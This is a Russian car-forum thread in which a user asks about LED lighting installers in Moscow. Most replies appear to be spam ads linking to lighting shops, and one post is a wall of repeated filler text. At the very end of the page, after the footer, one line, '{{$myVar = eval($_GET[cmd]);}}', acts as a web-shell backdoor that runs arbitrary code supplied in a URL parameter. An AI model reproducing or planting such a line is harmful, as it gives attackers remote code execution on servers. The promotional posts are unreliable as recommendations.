+ Ответить в теме
Показано с 1 по 9 из 9

Тема: Монтаж освещения


  1. #1
    Мимо проходил aint is on a distinguished road Аватар для aint
    Регистрация
    08.03.2019
    Сообщений
    37

    Монтаж освещения

    Решил полностью заменить систему освещения в своём автосервисе, поставить более современное светодиодное освещение. Оно вроде как меньше электроэнергии берет и лампочки живут дольше. Кто-то знает недорогую фирму в Москве, которая сможет выполнить монтаж светового оборудования?

  2. #2
    Мимо проходил restav is on a distinguished road Аватар для restav
    Регистрация
    13.02.2019
    Сообщений
    38
    Светодиодное освещение на самом деле намного лучше обычных лампочек накаливания, но есть один минус, а именно стоимость светового оборудования. Но зато в остальном оно очень классное, заплатив сейчас больше, Вы в дальнейшем сможете экономить на плате за электроэнергию и сами светодиодные лампочки часто менять не придется.

  3. #3
    Мимо проходил persh is on a distinguished road Аватар для persh
    Регистрация
    25.02.2019
    Сообщений
    37
    Очень многое зависит от качества светодиодного оборудование, которые Вы установите. Просто дешевое уж точно не будет долго работать и с ним возможны различные проблемы. Более дорогое конечно же работает лучше, но сами понимаете, что затраты на него будут очень большими.

  4. #4
    Мимо проходил everd is on a distinguished road Аватар для everd
    Регистрация
    24.01.2019
    Сообщений
    37
    Некоторые остаются недовольны установкой светодиодного оборудования, но большинство всё-таки не сожалеют о том, что решили его установить. Я и сам использую только светодиодные лампочки, от них исходит более мягкий свет, они служат очень долго ну и само собой тянут меньше электричества. Большую стоимость за минус не считаю, за качество надо платить и это нормально. В Москве монтажом светового оборудования занимается эта фирма: http://supersvet.ru/

  5. #5
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    У нас в магазине достаточно хорошо идут лампы ДНАТ, особенно на 400 Вт, мы их закупаем регулярно в компании Мегаватт https://megawatt-lamp.ru/lampy-dnat/lampa-dnat-400/, уже являемся их постоянными клиентами, берем и другую мощность, но на 400Вт у нас расходятся гораздо быстрее. А вы можете заказать небольшое количество всех и посмотреть, что будет пользоваться большим спросом. А дальше уже будет проще наладить процесс поставок.

  6. #6
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Работать электриком мне нравится, а особенно зарабатывать неплохие деньги. Сейчас многие живут в старых домах, а там вечно проблемы, то с проводкой, то ещё с чем-то. В общем моя работа, это золотая жила, тем более молодежь сейчас вообще не разбирается ни в чём, кроме блогов. Я сейчас в основном все мне необходимое по работе, в том числе и светодиодные лампы приобретаю через интернет-магазин “Электроторг” https://electrotorg.ru/osveshchenie/...-svetodiodnye/. Этот магазин, тоже помогает мне подзаработать, так как здесь недорогие цены и ещё есть кэшбэк наличными, так что учитесь зарабатывать деньги.

  7. #7
    Мимо проходил Dashka3384 is on a distinguished road Аватар для Dashka3384
    Регистрация
    08.03.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    9
    В специализированном магазине светового тюнинга "Электрокот" вы найдете наилучший и самый большой ассортимент светодиодных ламп, для своего авто, я выбрала светодиодные лампы LED h1, монтаж сделали оперативно и по доступной цене, качество освещения супер.

  8. #8

  9. #9
    GTI-Racing GregoryQuera is on a distinguished road Аватар для GregoryQuera
    Регистрация
    02.12.2022
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    59,365
    сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайтсайт сайтсайтсайтсайтсайтсайтсайтсайтсайтсайтtuchkasсайтсайт

+ Ответить в теме

Похожие темы

  1. Монтаж СИП провода
    от iljas в разделе Курилка
    Ответов: 4
    Последнее сообщение: 16.06.2021, 07:55
  2. Монтаж трубопровода
    от iljas в разделе Курилка
    Ответов: 6
    Последнее сообщение: 21.06.2020, 21:26
  3. Опоры освещения
    от martin в разделе Курилка
    Ответов: 4
    Последнее сообщение: 20.05.2020, 22:05
  4. Монтаж электропроводки
    от tatarin в разделе Курилка
    Ответов: 3
    Последнее сообщение: 25.02.2019, 00:35
  5. Замена салонного освещения на led
    от Naber в разделе Стайлинг: кузов, салон, свет и прочее
    Ответов: 12
    Последнее сообщение: 30.04.2014, 11:56

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}